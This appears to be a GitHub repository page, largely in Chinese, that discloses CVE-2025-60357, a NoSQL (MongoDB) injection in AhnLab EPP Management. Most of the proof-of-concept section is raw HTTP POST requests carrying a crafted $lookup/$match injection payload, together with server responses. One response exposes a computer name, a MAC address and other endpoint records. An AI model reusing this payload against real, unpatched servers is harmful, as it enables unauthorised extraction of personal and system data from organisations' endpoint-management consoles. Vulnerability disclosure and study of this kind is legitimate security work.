NyaMeeEain/CVE-2025-60357

GitHub: NyaMeeEain/CVE-2025-60357

该仓库提供了 AhnLab EPP Management 平台 CVE-2025-60357 NoSQL 注入漏洞的概念验证代码,演示如何通过操纵 MongoDB 查询参数实现敏感数据泄露。

Stars: 0 | Forks: 0

# CVE-2025-60357- NoSQL(MongoDB) 注入 #### 漏洞与产品描述 AhnLab EPP Management 是一款全球知名的下一代高级端点防护平台,集成了补丁管理、高级恶意软件检测、EDR 和 XDR 功能。 ***在 AhnLab EPP Management v1.0.14.32-6249 的 /api/console/ems/eventlog/agentEvent/list 端点中发现了 NoSQL(MongoDB) Injection 漏洞,导致敏感信息和个人身份信息(PII)泄露。由于 AhnLab 已于 2024 年 8 月发布了补丁版本(P14.32 > P16.25),受影响的端点现已修复。*** ``` Exploit Title: ***AhnLab EPP Management(Centralised Endpoint Security Management) -NoSQL Injection in MongoDB , which led to sensitive info and PII disclosure*** Date: 24 May 2024 Vulnerable Version: (1.0.14.32-6249) and before Fixed Version released (EPP Management version (P14.32 > P16.25)): August 2024 CVE : CVE-2025-60357 Vendor Homepage: https://www.ahnlab.com/en Software Link:https://www.ahnlab.com/ko/product/epp-management Product Reveiw:https://www.gartner.com/reviews/market/endpoint-protection-platforms/compare/product/ahnlab-edr-vs-ahnlab-epp Refence Link: https://www.cvedetails.com/cve/CVE-2025-60357 ``` ### POC 在 'agentEvent' 模块的请求体中包含了 MongoDB 查询,这使得已认证的攻击者能够构造 NoSQL 注入,从而从应用程序中提取特定信息。我们向请求体中附加了 lookup 操作查询,如下所示。 'agentEvent' 模块的请求体中原本包含 ***"\\$exists\\:true}",4197,10],"data":[]}}*** 我将其替换为了如下精心构造的 MongoDB 查询:***'\\$exists\\:true}}},{\\$lookup\\:{\"from\":\"tb_agent_event_log\",\"localField\":\"_id\",\"foreignField\":\"_id\",\"as\":\"details\"}},{\\$match\\:{\"node_id\": {\\$exists\\:true",4197,10],"data":[]}}'*** ``` POST /api/console/ems/eventlog/agentEvent/list HTTP/1.1 Host: 192.168.100.199:8803 Cookie: lang_set=en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: application/json;charset=utf-8 Accept-Language: de-CA,en-US;q=0.5,vi;q=0.3 Accept-Encoding: gzip, deflate, br Authorization: bearer Content-Type: application/json;charset=utf-8 Content-Length: 180 Origin: https://192.168.100.199:8803 Referer: https://192.168.100.199:8803/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close {"request": {"action":"get_event_log_agent_event_list_custom", "revision":"1", "params":["6628bcfc8b8a3556549fb3ae", "66293a8fd751df5dd61c868c", "\\$exists\\:true}",4197,10],"data":[]}} ``` ``` HTTP/1.1 200 strict-transport-security: max-age=0 x-frame-options: DENY x-content-type-options: nosniff content-type: application/json;charset=utf-8 content-length: 835 date: Thu, 25 Apr 2024 03:15:25 GMT cache-control: no-cache,no-store,no-control connection: close {"error_code":"EPP-99999","error_msg":"\n{\"collection\" : \"tb_agent_event_log\", \"data\" : [{\"$match\": {\"_id\": {\"$gte\":{\"$oid\":\"6628bcfc8b8a3556549fb3ae\"}, \"$lte\":{\"$oid\":\"66293a8fd751df5dd61c868c\"}}, \"node_id\": {$exists:true}} }}, {\"$skip\": 4197},{\"$project\": {\"_id\":\"$_id\",\"client_time\":\"$client_time\",\"node_id\":\"$node_id\",\"ip\":\"$ip\",\"computer_name\":\"$computer_name\",\"login_id\":\"$login_id\",\"user_name\":\"$user_name\",\"mac\":\"$mac\",\"department\":\"$department\",\"log_string_id\":\"$log_string_id\", \"log_string_args\":\"$log_string_args\"}}, {\"$limit\": 10}]}\n ^","revision":1,"response":[]} ``` ### 任意请求 ``` POST /api/console/ems/eventlog/agentEvent/list HTTP/1.1 Host: 192.168.100.199:8803 Cookie: lang_set=en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: application/json;charset=utf-8 Accept-Language: de-CA,en-US;q=0.5,vi;q=0.3 Accept-Encoding: gzip, deflate, br Authorization: bearer Content-Type: application/json;charset=utf-8 Content-Length: 341 Origin: https://192.168.100.199:8803 Referer: https://192.168.100.199:8803/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close {"request": {"action":"get_event_log_agent_event_list_custom", "revision":"1","params":["6628bcfc8b8a3556549fb3ae", "66293a8fd751df5dd61c868c", "\\$exists\\:true}}},{\\$lookup\\:{\"from\":\"tb_agent_event_log\",\"localField\":\"_id\",\"foreignField\":\"_id\",\"as\":\"details\"}},{\\$match\\:{\"node_id\": {\\$exists\\:true",4197,10],"data":[]}} ``` ### 响应 ``` HTTP/1.1 200 strict-transport-security: max-age=0 x-frame-options: DENY x-content-type-options: nosniff content-type: application/json;charset=utf-8 content-length: 4516 date: Wed, 24 Apr 2024 10:52:13 GMT cache-control: no-cache,no-store,no-control connection: close {"error_code":"EPP-00000", "error_msg":"success", "revision":1, "response":[{"_id":{"timestamp":1713945876, "counter":10472102, "machineIdentifier":9144885, "processIdentifier":22100,"timeSecond":1713945876,"time":1713945876000,"date":1713945876000}, "client_time":1713946136892,"node_id":2914,"ip":"Reacted.Reacted.Reacted", "computer_name":"tiwaporn-k03","login_id":"Reacted","user_name":null, "mac":"40-ef-0e-c5-13-37", "department":"/group//Reacted/Reacted.Reacted.0.0/Reacted.Reacted.226.0", "log_string_id":"EPPAGENT_LOGID_21003","log_string_args":null}, ```
标签:CISA项目, Homebrew安装, NoSQL注入, POC